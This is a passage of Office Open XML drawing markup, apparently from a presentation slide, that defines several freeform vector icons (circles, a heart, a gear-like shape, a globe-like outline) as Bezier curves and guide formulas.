                      <a:pt x="20" y="54"/>
                      <a:pt x="26" y="56"/>
                      <a:pt x="33" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="56"/>
                      <a:pt x="45" y="54"/>
                      <a:pt x="50" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="49"/>
                      <a:pt x="51" y="49"/>
                      <a:pt x="51" y="4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1" y="60"/>
                      <a:pt x="43" y="65"/>
                      <a:pt x="33" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="65"/>
                      <a:pt x="0" y="50"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="14"/>
                      <a:pt x="15" y="0"/>
                      <a:pt x="33" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="0"/>
                      <a:pt x="50" y="4"/>
                      <a:pt x="56" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="0"/>
                      <a:pt x="65" y="0"/>
                      <a:pt x="65" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="65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4" name="Freeform 171">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4F41AD0-17E8-4ED1-8E7F-E3F0499D0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4589" y="1177939"/>
                <a:ext cx="172245" cy="170287"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 27 w 54"/>
                  <a:gd name="T1" fmla="*/ 0 h 53"/>
                  <a:gd name="T2" fmla="*/ 0 w 54"/>
                  <a:gd name="T3" fmla="*/ 26 h 53"/>
                  <a:gd name="T4" fmla="*/ 27 w 54"/>
                  <a:gd name="T5" fmla="*/ 53 h 53"/>
                  <a:gd name="T6" fmla="*/ 54 w 54"/>
                  <a:gd name="T7" fmla="*/ 26 h 53"/>
                  <a:gd name="T8" fmla="*/ 27 w 54"/>
                  <a:gd name="T9" fmla="*/ 0 h 53"/>
                  <a:gd name="T10" fmla="*/ 16 w 54"/>
                  <a:gd name="T11" fmla="*/ 43 h 53"/>
                  <a:gd name="T12" fmla="*/ 17 w 54"/>
                  <a:gd name="T13" fmla="*/ 38 h 53"/>
                  <a:gd name="T14" fmla="*/ 7 w 54"/>
                  <a:gd name="T15" fmla="*/ 24 h 53"/>
                  <a:gd name="T16" fmla="*/ 13 w 54"/>
                  <a:gd name="T17" fmla="*/ 12 h 53"/>
                  <a:gd name="T18" fmla="*/ 27 w 54"/>
                  <a:gd name="T19" fmla="*/ 6 h 53"/>
                  <a:gd name="T20" fmla="*/ 41 w 54"/>
                  <a:gd name="T21" fmla="*/ 12 h 53"/>
                  <a:gd name="T22" fmla="*/ 47 w 54"/>
                  <a:gd name="T23" fmla="*/ 24 h 53"/>
                  <a:gd name="T24" fmla="*/ 37 w 54"/>
                  <a:gd name="T25" fmla="*/ 38 h 53"/>
                  <a:gd name="T26" fmla="*/ 38 w 54"/>
                  <a:gd name="T27" fmla="*/ 43 h 53"/>
                  <a:gd name="T28" fmla="*/ 27 w 54"/>
                  <a:gd name="T29" fmla="*/ 46 h 53"/>
                  <a:gd name="T30" fmla="*/ 16 w 54"/>
                  <a:gd name="T31" fmla="*/ 43 h 53"/>
                  <a:gd name="T32" fmla="*/ 29 w 54"/>
                  <a:gd name="T33" fmla="*/ 33 h 53"/>
                  <a:gd name="T34" fmla="*/ 30 w 54"/>
                  <a:gd name="T35" fmla="*/ 35 h 53"/>
                  <a:gd name="T36" fmla="*/ 30 w 54"/>
                  <a:gd name="T37" fmla="*/ 38 h 53"/>
                  <a:gd name="T38" fmla="*/ 28 w 54"/>
                  <a:gd name="T39" fmla="*/ 40 h 53"/>
                  <a:gd name="T40" fmla="*/ 25 w 54"/>
                  <a:gd name="T41" fmla="*/ 40 h 53"/>
                  <a:gd name="T42" fmla="*/ 23 w 54"/>
                  <a:gd name="T43" fmla="*/ 38 h 53"/>
                  <a:gd name="T44" fmla="*/ 23 w 54"/>
                  <a:gd name="T45" fmla="*/ 35 h 53"/>
                  <a:gd name="T46" fmla="*/ 25 w 54"/>
                  <a:gd name="T47" fmla="*/ 33 h 53"/>
                  <a:gd name="T48" fmla="*/ 26 w 54"/>
                  <a:gd name="T49" fmla="*/ 10 h 53"/>
                  <a:gd name="T50" fmla="*/ 28 w 54"/>
                  <a:gd name="T51" fmla="*/ 10 h 53"/>
                  <a:gd name="T52" fmla="*/ 29 w 54"/>
                  <a:gd name="T53" fmla="*/ 3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4" h="53">
                    <a:moveTo>
                      <a:pt x="27" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="0"/>
                      <a:pt x="0" y="12"/>
                      <a:pt x="0" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="41"/>
                      <a:pt x="12" y="53"/>
                      <a:pt x="27" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="53"/>
                      <a:pt x="54" y="41"/>
                      <a:pt x="54" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="12"/>
                      <a:pt x="42" y="0"/>
                      <a:pt x="27" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="16" y="43"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="42"/>
                      <a:pt x="17" y="40"/>
                      <a:pt x="17" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="32"/>
                      <a:pt x="13" y="26"/>
                      <a:pt x="7" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="20"/>
                      <a:pt x="9" y="15"/>
                      <a:pt x="13" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="8"/>
                      <a:pt x="21" y="6"/>
                      <a:pt x="27" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="6"/>
                      <a:pt x="37" y="8"/>
                      <a:pt x="41" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="15"/>
                      <a:pt x="46" y="20"/>
                      <a:pt x="47" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="26"/>
                      <a:pt x="37" y="32"/>
                      <a:pt x="37" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="40"/>
                      <a:pt x="37" y="42"/>
                      <a:pt x="38" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="45"/>
                      <a:pt x="31" y="46"/>
                      <a:pt x="27" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="46"/>
                      <a:pt x="19" y="45"/>
                      <a:pt x="16" y="43"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="29" y="33"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="33"/>
                      <a:pt x="30" y="34"/>
                      <a:pt x="30" y="35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9"/>
                      <a:pt x="29" y="40"/>
                      <a:pt x="28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4" y="40"/>
                      <a:pt x="23" y="39"/>
                      <a:pt x="23" y="38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3" y="34"/>
                      <a:pt x="24" y="33"/>
                      <a:pt x="25" y="33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8" y="10"/>
                      <a:pt x="28" y="10"/>
                      <a:pt x="28" y="10"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="29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5" name="Freeform 174">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26D08B69-EBD3-409D-9B13-E5244901BA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89088" y="3493458"/>
                <a:ext cx="201605" cy="199648"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 32 w 63"/>
                  <a:gd name="T1" fmla="*/ 62 h 62"/>
                  <a:gd name="T2" fmla="*/ 0 w 63"/>
                  <a:gd name="T3" fmla="*/ 31 h 62"/>
                  <a:gd name="T4" fmla="*/ 32 w 63"/>
                  <a:gd name="T5" fmla="*/ 0 h 62"/>
                  <a:gd name="T6" fmla="*/ 63 w 63"/>
                  <a:gd name="T7" fmla="*/ 31 h 62"/>
                  <a:gd name="T8" fmla="*/ 32 w 63"/>
                  <a:gd name="T9" fmla="*/ 62 h 62"/>
                  <a:gd name="T10" fmla="*/ 58 w 63"/>
                  <a:gd name="T11" fmla="*/ 36 h 62"/>
                  <a:gd name="T12" fmla="*/ 41 w 63"/>
                  <a:gd name="T13" fmla="*/ 34 h 62"/>
                  <a:gd name="T14" fmla="*/ 46 w 63"/>
                  <a:gd name="T15" fmla="*/ 53 h 62"/>
                  <a:gd name="T16" fmla="*/ 58 w 63"/>
                  <a:gd name="T17" fmla="*/ 36 h 62"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 56 h 62"/>
                  <a:gd name="T20" fmla="*/ 36 w 63"/>
                  <a:gd name="T21" fmla="*/ 36 h 62"/>
                  <a:gd name="T22" fmla="*/ 36 w 63"/>
                  <a:gd name="T23" fmla="*/ 36 h 62"/>
                  <a:gd name="T24" fmla="*/ 15 w 63"/>
                  <a:gd name="T25" fmla="*/ 52 h 62"/>
                  <a:gd name="T26" fmla="*/ 32 w 63"/>
                  <a:gd name="T27" fmla="*/ 58 h 62"/>
                  <a:gd name="T28" fmla="*/ 42 w 63"/>
                  <a:gd name="T29" fmla="*/ 56 h 62"/>
                  <a:gd name="T30" fmla="*/ 12 w 63"/>
                  <a:gd name="T31" fmla="*/ 49 h 62"/>
                  <a:gd name="T32" fmla="*/ 33 w 63"/>
                  <a:gd name="T33" fmla="*/ 32 h 62"/>
                  <a:gd name="T34" fmla="*/ 34 w 63"/>
                  <a:gd name="T35" fmla="*/ 31 h 62"/>
                  <a:gd name="T36" fmla="*/ 32 w 63"/>
                  <a:gd name="T37" fmla="*/ 27 h 62"/>
                  <a:gd name="T38" fmla="*/ 5 w 63"/>
                  <a:gd name="T39" fmla="*/ 31 h 62"/>
                  <a:gd name="T40" fmla="*/ 5 w 63"/>
                  <a:gd name="T41" fmla="*/ 31 h 62"/>
                  <a:gd name="T42" fmla="*/ 12 w 63"/>
                  <a:gd name="T43" fmla="*/ 49 h 62"/>
                  <a:gd name="T44" fmla="*/ 5 w 63"/>
                  <a:gd name="T45" fmla="*/ 26 h 62"/>
                  <a:gd name="T46" fmla="*/ 30 w 63"/>
                  <a:gd name="T47" fmla="*/ 23 h 62"/>
                  <a:gd name="T48" fmla="*/ 20 w 63"/>
                  <a:gd name="T49" fmla="*/ 7 h 62"/>
                  <a:gd name="T50" fmla="*/ 5 w 63"/>
                  <a:gd name="T51" fmla="*/ 26 h 62"/>
                  <a:gd name="T52" fmla="*/ 25 w 63"/>
                  <a:gd name="T53" fmla="*/ 6 h 62"/>
                  <a:gd name="T54" fmla="*/ 35 w 63"/>
                  <a:gd name="T55" fmla="*/ 21 h 62"/>
                  <a:gd name="T56" fmla="*/ 49 w 63"/>
                  <a:gd name="T57" fmla="*/ 12 h 62"/>
                  <a:gd name="T58" fmla="*/ 32 w 63"/>
                  <a:gd name="T59" fmla="*/ 5 h 62"/>
                  <a:gd name="T60" fmla="*/ 25 w 63"/>
                  <a:gd name="T61" fmla="*/ 6 h 62"/>
                  <a:gd name="T62" fmla="*/ 52 w 63"/>
                  <a:gd name="T63" fmla="*/ 15 h 62"/>
                  <a:gd name="T64" fmla="*/ 37 w 63"/>
                  <a:gd name="T65" fmla="*/ 25 h 62"/>
                  <a:gd name="T66" fmla="*/ 39 w 63"/>
                  <a:gd name="T67" fmla="*/ 29 h 62"/>
                  <a:gd name="T68" fmla="*/ 40 w 63"/>
                  <a:gd name="T69" fmla="*/ 30 h 62"/>
                  <a:gd name="T70" fmla="*/ 58 w 63"/>
                  <a:gd name="T71" fmla="*/ 31 h 62"/>
                  <a:gd name="T72" fmla="*/ 52 w 63"/>
                  <a:gd name="T73" fmla="*/ 1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3" h="62">
                    <a:moveTo>
                      <a:pt x="32" y="62"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="62"/>
                      <a:pt x="0" y="49"/>
                      <a:pt x="0" y="31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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="49"/>
                      <a:pt x="49" y="62"/>
                      <a:pt x="32" y="62"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="58" y="36"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="35"/>
                      <a:pt x="50" y="33"/>
                      <a:pt x="41" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="44"/>
                      <a:pt x="46" y="52"/>
                      <a:pt x="46" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="49"/>
                      <a:pt x="57" y="43"/>
                      <a:pt x="58" y="36"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="42" y="56"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="54"/>
                      <a:pt x="40" y="45"/>
                      <a:pt x="36" y="36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21" y="41"/>
                      <a:pt x="16" y="51"/>
                      <a:pt x="15" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="56"/>
                      <a:pt x="25" y="58"/>
                      <a:pt x="32" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="58"/>
                      <a:pt x="39" y="57"/>
                      <a:pt x="42" y="56"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="12" y="49"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="48"/>
                      <a:pt x="20" y="36"/>
                      <a:pt x="33" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="32"/>
                      <a:pt x="34" y="31"/>
                      <a:pt x="34" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="30"/>
                      <a:pt x="33" y="28"/>
                      <a:pt x="32" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="31"/>
                      <a:pt x="6" y="31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8"/>
                      <a:pt x="8" y="44"/>
                      <a:pt x="12" y="49"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="5" y="26"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="26"/>
                      <a:pt x="18" y="26"/>
                      <a:pt x="30" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="15"/>
                      <a:pt x="21" y="8"/>
                      <a:pt x="20" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="11"/>
                      <a:pt x="7" y="18"/>
                      <a:pt x="5" y="26"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="25" y="6"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="7"/>
                      <a:pt x="31" y="13"/>
                      <a:pt x="35" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="18"/>
                      <a:pt x="49" y="12"/>
                      <a:pt x="49" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="7"/>
                      <a:pt x="38" y="5"/>
                      <a:pt x="32" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="5"/>
                      <a:pt x="27" y="5"/>
                      <a:pt x="25" y="6"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="52" y="15"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="15"/>
                      <a:pt x="47" y="21"/>
                      <a:pt x="37" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="26"/>
                      <a:pt x="38" y="28"/>
                      <a:pt x="39" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="29"/>
                      <a:pt x="39" y="30"/>
                      <a:pt x="40" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="29"/>
                      <a:pt x="57" y="31"/>
                      <a:pt x="58" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="25"/>
                      <a:pt x="56" y="19"/>
                      <a:pt x="5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6" name="Freeform 175">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E76FAF7-DFAA-4ED9-B53E-AA7287F32C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24496" y="4556288"/>
                <a:ext cx="207477" cy="182031"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 65 w 65"/>
                  <a:gd name="T1" fmla="*/ 19 h 57"/>
                  <a:gd name="T2" fmla="*/ 47 w 65"/>
                  <a:gd name="T3" fmla="*/ 0 h 57"/>
                  <a:gd name="T4" fmla="*/ 32 w 65"/>
                  <a:gd name="T5" fmla="*/ 6 h 57"/>
                  <a:gd name="T6" fmla="*/ 18 w 65"/>
                  <a:gd name="T7" fmla="*/ 0 h 57"/>
                  <a:gd name="T8" fmla="*/ 0 w 65"/>
                  <a:gd name="T9" fmla="*/ 19 h 57"/>
                  <a:gd name="T10" fmla="*/ 6 w 65"/>
                  <a:gd name="T11" fmla="*/ 33 h 57"/>
                  <a:gd name="T12" fmla="*/ 6 w 65"/>
                  <a:gd name="T13" fmla="*/ 33 h 57"/>
                  <a:gd name="T14" fmla="*/ 26 w 65"/>
                  <a:gd name="T15" fmla="*/ 53 h 57"/>
                  <a:gd name="T16" fmla="*/ 32 w 65"/>
                  <a:gd name="T17" fmla="*/ 57 h 57"/>
                  <a:gd name="T18" fmla="*/ 39 w 65"/>
                  <a:gd name="T19" fmla="*/ 53 h 57"/>
                  <a:gd name="T20" fmla="*/ 59 w 65"/>
                  <a:gd name="T21" fmla="*/ 33 h 57"/>
                  <a:gd name="T22" fmla="*/ 59 w 65"/>
                  <a:gd name="T23" fmla="*/ 33 h 57"/>
                  <a:gd name="T24" fmla="*/ 65 w 65"/>
                  <a:gd name="T25" fmla="*/ 19 h 57"/>
                  <a:gd name="T26" fmla="*/ 54 w 65"/>
                  <a:gd name="T27" fmla="*/ 27 h 57"/>
                  <a:gd name="T28" fmla="*/ 33 w 65"/>
                  <a:gd name="T29" fmla="*/ 47 h 57"/>
                  <a:gd name="T30" fmla="*/ 32 w 65"/>
                  <a:gd name="T31" fmla="*/ 48 h 57"/>
                  <a:gd name="T32" fmla="*/ 32 w 65"/>
                  <a:gd name="T33" fmla="*/ 47 h 57"/>
                  <a:gd name="T34" fmla="*/ 11 w 65"/>
                  <a:gd name="T35" fmla="*/ 27 h 57"/>
                  <a:gd name="T36" fmla="*/ 8 w 65"/>
                  <a:gd name="T37" fmla="*/ 19 h 57"/>
                  <a:gd name="T38" fmla="*/ 18 w 65"/>
                  <a:gd name="T39" fmla="*/ 8 h 57"/>
                  <a:gd name="T40" fmla="*/ 26 w 65"/>
                  <a:gd name="T41" fmla="*/ 11 h 57"/>
                  <a:gd name="T42" fmla="*/ 32 w 65"/>
                  <a:gd name="T43" fmla="*/ 18 h 57"/>
                  <a:gd name="T44" fmla="*/ 39 w 65"/>
                  <a:gd name="T45" fmla="*/ 11 h 57"/>
                  <a:gd name="T46" fmla="*/ 47 w 65"/>
                  <a:gd name="T47" fmla="*/ 8 h 57"/>
                  <a:gd name="T48" fmla="*/ 57 w 65"/>
                  <a:gd name="T49" fmla="*/ 19 h 57"/>
                  <a:gd name="T50" fmla="*/ 54 w 65"/>
                  <a:gd name="T51" fmla="*/ 2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5" h="57">
                    <a:moveTo>
                      <a:pt x="65" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="8"/>
                      <a:pt x="57" y="0"/>
                      <a:pt x="47" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="0"/>
                      <a:pt x="36" y="2"/>
                      <a:pt x="32" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="2"/>
                      <a:pt x="24" y="0"/>
                      <a:pt x="18" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="0"/>
                      <a:pt x="0" y="8"/>
                      <a:pt x="0" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="24"/>
                      <a:pt x="2" y="29"/>
                      <a:pt x="6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8" y="55"/>
                      <a:pt x="30" y="57"/>
                      <a:pt x="32" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="57"/>
                      <a:pt x="37" y="55"/>
                      <a:pt x="39" y="5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59" y="33"/>
                      <a:pt x="59" y="33"/>
                      <a:pt x="59" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="29"/>
                      <a:pt x="65" y="24"/>
                      <a:pt x="65" y="19"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="54" y="27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33" y="47"/>
                      <a:pt x="33" y="48"/>
                      <a:pt x="32" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="48"/>
                      <a:pt x="32" y="47"/>
                      <a:pt x="32" y="4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9" y="24"/>
                      <a:pt x="8" y="22"/>
                      <a:pt x="8" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="13"/>
                      <a:pt x="13" y="8"/>
                      <a:pt x="18" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="8"/>
                      <a:pt x="24" y="9"/>
                      <a:pt x="26" y="11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9"/>
                      <a:pt x="43" y="8"/>
                      <a:pt x="47" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="8"/>
                      <a:pt x="57" y="13"/>
                      <a:pt x="57" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="22"/>
                      <a:pt x="56" y="24"/>
                      <a:pt x="5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7" name="Freeform 177">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FA9E774-7CB0-4D8B-93A2-0118E594D8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25924" y="4971241"/>
                <a:ext cx="150715" cy="154628"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 43 w 47"/>
                  <a:gd name="T1" fmla="*/ 29 h 48"/>
                  <a:gd name="T2" fmla="*/ 47 w 47"/>
                  <a:gd name="T3" fmla="*/ 16 h 48"/>
                  <a:gd name="T4" fmla="*/ 42 w 47"/>
                  <a:gd name="T5" fmla="*/ 8 h 48"/>
                  <a:gd name="T6" fmla="*/ 37 w 47"/>
                  <a:gd name="T7" fmla="*/ 9 h 48"/>
                  <a:gd name="T8" fmla="*/ 28 w 47"/>
                  <a:gd name="T9" fmla="*/ 0 h 48"/>
                  <a:gd name="T10" fmla="*/ 19 w 47"/>
                  <a:gd name="T11" fmla="*/ 0 h 48"/>
                  <a:gd name="T12" fmla="*/ 18 w 47"/>
                  <a:gd name="T13" fmla="*/ 5 h 48"/>
                  <a:gd name="T14" fmla="*/ 5 w 47"/>
                  <a:gd name="T15" fmla="*/ 8 h 48"/>
                  <a:gd name="T16" fmla="*/ 0 w 47"/>
                  <a:gd name="T17" fmla="*/ 16 h 48"/>
                  <a:gd name="T18" fmla="*/ 4 w 47"/>
                  <a:gd name="T19" fmla="*/ 20 h 48"/>
                  <a:gd name="T20" fmla="*/ 0 w 47"/>
                  <a:gd name="T21" fmla="*/ 32 h 48"/>
                  <a:gd name="T22" fmla="*/ 5 w 47"/>
                  <a:gd name="T23" fmla="*/ 40 h 48"/>
                  <a:gd name="T24" fmla="*/ 10 w 47"/>
                  <a:gd name="T25" fmla="*/ 39 h 48"/>
                  <a:gd name="T26" fmla="*/ 19 w 47"/>
                  <a:gd name="T27" fmla="*/ 48 h 48"/>
                  <a:gd name="T28" fmla="*/ 28 w 47"/>
                  <a:gd name="T29" fmla="*/ 48 h 48"/>
                  <a:gd name="T30" fmla="*/ 29 w 47"/>
                  <a:gd name="T31" fmla="*/ 44 h 48"/>
                  <a:gd name="T32" fmla="*/ 42 w 47"/>
                  <a:gd name="T33" fmla="*/ 40 h 48"/>
                  <a:gd name="T34" fmla="*/ 47 w 47"/>
                  <a:gd name="T35" fmla="*/ 32 h 48"/>
                  <a:gd name="T36" fmla="*/ 43 w 47"/>
                  <a:gd name="T37" fmla="*/ 29 h 48"/>
                  <a:gd name="T38" fmla="*/ 23 w 47"/>
                  <a:gd name="T39" fmla="*/ 34 h 48"/>
                  <a:gd name="T40" fmla="*/ 14 w 47"/>
                  <a:gd name="T41" fmla="*/ 24 h 48"/>
                  <a:gd name="T42" fmla="*/ 23 w 47"/>
                  <a:gd name="T43" fmla="*/ 14 h 48"/>
                  <a:gd name="T44" fmla="*/ 33 w 47"/>
                  <a:gd name="T45" fmla="*/ 24 h 48"/>
                  <a:gd name="T46" fmla="*/ 23 w 47"/>
                  <a:gd name="T47" fmla="*/ 3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7" h="48">
                    <a:moveTo>
                      <a:pt x="43" y="29"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="24"/>
                      <a:pt x="42" y="19"/>
                      <a:pt x="47" y="16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1" y="9"/>
                      <a:pt x="39" y="9"/>
                      <a:pt x="37" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="9"/>
                      <a:pt x="28" y="5"/>
                      <a:pt x="2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2"/>
                      <a:pt x="18" y="3"/>
                      <a:pt x="18" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="9"/>
                      <a:pt x="9" y="11"/>
                      <a:pt x="5" y="8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" y="17"/>
                      <a:pt x="3" y="18"/>
                      <a:pt x="4" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="24"/>
                      <a:pt x="5" y="30"/>
                      <a:pt x="0" y="32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6" y="40"/>
                      <a:pt x="8" y="39"/>
                      <a:pt x="10" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="39"/>
                      <a:pt x="19" y="43"/>
                      <a:pt x="19" y="48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28" y="47"/>
                      <a:pt x="29" y="45"/>
                      <a:pt x="29" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="39"/>
                      <a:pt x="38" y="38"/>
                      <a:pt x="42" y="40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5" y="31"/>
                      <a:pt x="44" y="30"/>
                      <a:pt x="43" y="29"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="23" y="34"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="34"/>
                      <a:pt x="14" y="30"/>
                      <a:pt x="14" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="19"/>
                      <a:pt x="18" y="14"/>
                      <a:pt x="23" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="14"/>
                      <a:pt x="33" y="19"/>
                      <a:pt x="33" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="30"/>
                      <a:pt x="29" y="34"/>
                      <a:pt x="23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8" name="Freeform 178">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95CC50F9-614D-47A7-971F-CD2640FC9F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88188" y="4926222"/>
                <a:ext cx="248581" cy="250538"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 67 w 127"/>
                  <a:gd name="T1" fmla="*/ 0 h 128"/>
                  <a:gd name="T2" fmla="*/ 55 w 127"/>
                  <a:gd name="T3" fmla="*/ 13 h 128"/>
                  <a:gd name="T4" fmla="*/ 67 w 127"/>
                  <a:gd name="T5" fmla="*/ 25 h 128"/>
                  <a:gd name="T6" fmla="*/ 39 w 127"/>
                  <a:gd name="T7" fmla="*/ 56 h 128"/>
                  <a:gd name="T8" fmla="*/ 11 w 127"/>
                  <a:gd name="T9" fmla="*/ 56 h 128"/>
                  <a:gd name="T10" fmla="*/ 32 w 127"/>
                  <a:gd name="T11" fmla="*/ 79 h 128"/>
                  <a:gd name="T12" fmla="*/ 0 w 127"/>
                  <a:gd name="T13" fmla="*/ 123 h 128"/>
                  <a:gd name="T14" fmla="*/ 0 w 127"/>
